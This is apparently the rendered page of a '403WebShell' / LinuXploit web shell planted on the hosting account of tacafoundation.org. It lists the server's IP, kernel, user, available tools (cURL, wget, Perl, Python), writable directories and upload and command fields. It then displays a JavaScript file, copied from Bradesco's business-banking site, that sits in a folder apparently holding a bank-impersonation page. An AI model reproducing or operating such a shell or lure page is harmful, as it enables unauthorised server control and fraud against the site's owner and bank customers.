Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.117.184.236
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/sacbradescolivelo/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/sacbradescolivelo/js/validanavegadorexclusivo.js
/* INICIO - Funções para criar, recuperar e deletar valores em cookies */
function setCookieIB(cname, cvalue, exdays) {
    var d = new Date();
    d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
    var expires = "expires=" + d.toGMTString();
    document.cookie = cname + "=" + cvalue + "; " + expires + "; path=/";
}

function getCookieIB(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');

    for (var i = 0; i < ca.length; i++) {
        var c = ca[i].replace(" ", "");
        if (c.indexOf(name) == 0) return c.substring(name.length, c.length);
    }

    return "";
}

function deleteCookieIB(name) {
  document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
}
/* FIM - Funções para criar, recuperar e deletar valores em cookies */

/* INICIO - Modal Navegador Exclusivo Bradesco */
function VerificaCookieModalNavegador() {

    if(location.href.indexOf('/html/pessoajuridica') > -1 ||
       location.href.indexOf('/html/corporate') > -1 ){

        var md = 3;//parseInt(getCookieIB('NavExcModal')) || 0;
        var NavegadorExclusivo = navigator.userAgent;

		// Vai para Conta Colocar //
        if( $.ua.os.name == 'Mac OS' ||
           NavegadorExclusivo.indexOf('NetExpress(3.0.3)') > -1 ||
           NavegadorExclusivo.indexOf('NetExpress(3.0.5)') > -1 ||
           NavegadorExclusivo.indexOf('NetExpress(4.0.1)') > -1 ||
		   NavegadorExclusivo.indexOf('NetExpress(4.0.2)') > -1 ||
           NavegadorExclusivo.indexOf('Firefox/3.0.3') > -1 ||
           NavegadorExclusivo.indexOf('Firefox/3.0.5') > -1 ||
		   NavegadorExclusivo.indexOf('Firefox/4.0.1') > -1 ||
           NavegadorExclusivo.indexOf('Firefox/4.0.2') > -1 ) {
            $('.area-restrita.otherbrowser a.bt-md-nav-1').show();
            $('.area-restrita.otherbrowser a.bt-md-nav-2').hide();
            $('.area-restrita.otherbrowser a.bt-md-nav-3').hide();
            $('.area-restrita.otherbrowser a.bt-md-nav-4').hide();
        } else if (md > 2) {
            VerificaNavegadorExclusivoxOutros();
        }

        // Verifica se é o Chrome e mostra a interação do mesmo
        if ( $.ua.browser.name == 'Chrome' && $.ua.os.name == 'Windows' ){
            $('div.area-restrita.otherbrowser').hide();
            $('div.area-restrita.chrome').show();
        } else {
            $('div.area-restrita.otherbrowser').show();
            $('div.area-restrita.chrome').hide();
        }
    }
}
         //Elseif não vai para  conta//
function VerificaNavegadorExclusivoxOutros(){
    var NavegadorExclusivo = navigator.userAgent;
    if (NavegadorExclusivo.indexOf('Firefox/29.0') > -1 ||
        NavegadorExclusivo.indexOf('Bradesco/1.0.1') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(1.0' ) > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(1.0.0)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(1.0.1)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(1.0.3)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(1.0.0.1)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(1.0.0.3)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(2.0.0)') > -1 ||
        NavegadorExclusivo.indexOf('Firefox/2.0.0') > -1) {
        $('.area-restrita.otherbrowser a.bt-md-nav-1').hide();
        $('.area-restrita.otherbrowser a.bt-md-nav-2').hide();
        $('.area-restrita.otherbrowser a.bt-md-nav-3').hide();
        $('.area-restrita.otherbrowser a.bt-md-nav-4').show();
    } else if
       (NavegadorExclusivo.indexOf('NetExpress(3.0.0)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(3.0.1)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(3.0.2)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(3.0.4)') > -1 ||
        NavegadorExclusivo.indexOf('NetExpress(4.0.0)') > -1 ||
        NavegadorExclusivo.indexOf('Firefox/3.0.0') > -1 ||
        NavegadorExclusivo.indexOf('Firefox/3.0.1') > -1 ||
        NavegadorExclusivo.indexOf('Firefox/3.0.2') > -1 ||
        NavegadorExclusivo.indexOf('Firefox/3.0.4') > -1 ||
        NavegadorExclusivo.indexOf('Firefox/4.0.0') > -1 ) {
        $('.area-restrita.otherbrowser a.bt-md-nav-1').hide();
        $('.area-restrita.otherbrowser a.bt-md-nav-2').hide();
        $('.area-restrita.otherbrowser a.bt-md-nav-3').show();
        $('.area-restrita.otherbrowser a.bt-md-nav-4').hide();
    } else {
        $('.area-restrita.otherbrowser a.bt-md-nav-1').hide();
        $('.area-restrita.otherbrowser a.bt-md-nav-2').show();
        $('.area-restrita.otherbrowser a.bt-md-nav-3').hide();
        $('.area-restrita.otherbrowser a.bt-md-nav-4').hide();
    }
}

function GravaCookieNavegadorSaibaMais(){
    setCookieIB('NavExcModal','',1);
    VerificaNavegadorExclusivoxOutros();
}

function GravaCookieNavegadorFechar(){
    setCookieIB('NavExcModal','',1);
    VerificaNavegadorExclusivoxOutros();
}

function GravaCookieModalNavegador(){
    var ExibicaoM = 1;
    ExibicaoM = parseInt(getCookieIB('NavExcModal')) || 0;
    setCookieIB('NavExcModal',(ExibicaoM+1),360);
}

function DirecionaLogin(){
    if(location.href.indexOf('/html/corporate') > -1){ //Corporate
        window.location.href ='https://www.ne12.bradesconetempresa.b.br/ibpjlogin/login.jsf?nscnn=2';
    } else {
        window.location.href ='https://www.ne12.bradesconetempresa.b.br/ibpjlogin/login.jsf';
    }
}

function trackModalNavegadorChrome(){
    setTimeout(function(){
        $("#modalChrome .mfp-close").attr("onclick", "trackBradesco('Intervencao','Chrome','Fechar');");
    }, 150);
}

function trackModalNavegadorExclusivoV1(){
    setTimeout(function(){
        $("#modalOtherBrowser .mfp-close").attr("onclick", "trackBradesco('Intervencao','Navegador Bradesco 1','Fechar');");
    }, 150);
}

function trackModalNavegador(){
    setTimeout(function(){
        $("#modalOtherBrowser .mfp-close").attr("onclick", "GravaCookieNavegadorFechar();DirecionaLogin();trackBradesco('Intervencao','Demais Navegadores','Fechar');");
    }, 150);
}

function trackModalNavegadorExclusivo(){
    setTimeout(function(){
        $("#modalOtherBrowser .mfp-close").attr("onclick", "GravaCookieNavegadorFechar();DirecionaLogin();trackBradesco('Intervencao','Navegador Bradesco','Fechar');");
    }, 150);
}
/* FIM - Modal Navegador Exclusivo Bradesco */

function getVersionNEB() {
    if( navigator.userAgent.indexOf( 'Firefox/3' ) > -1 || navigator.userAgent.indexOf( 'Firefox/4' ) > -1 ) {
        $('a').removeClass('modalFree');
        $('a.botaoAbraConta').attr('href', 'https://www.ne12.bradesconetempresa.b.br/ibpjlogin/login.jsf');
    }
}

$(document).ready(function () {
    getVersionNEB();
    VerificaCookieModalNavegador();
});

Youez - 2016 - github.com/yon3zu
LinuXploit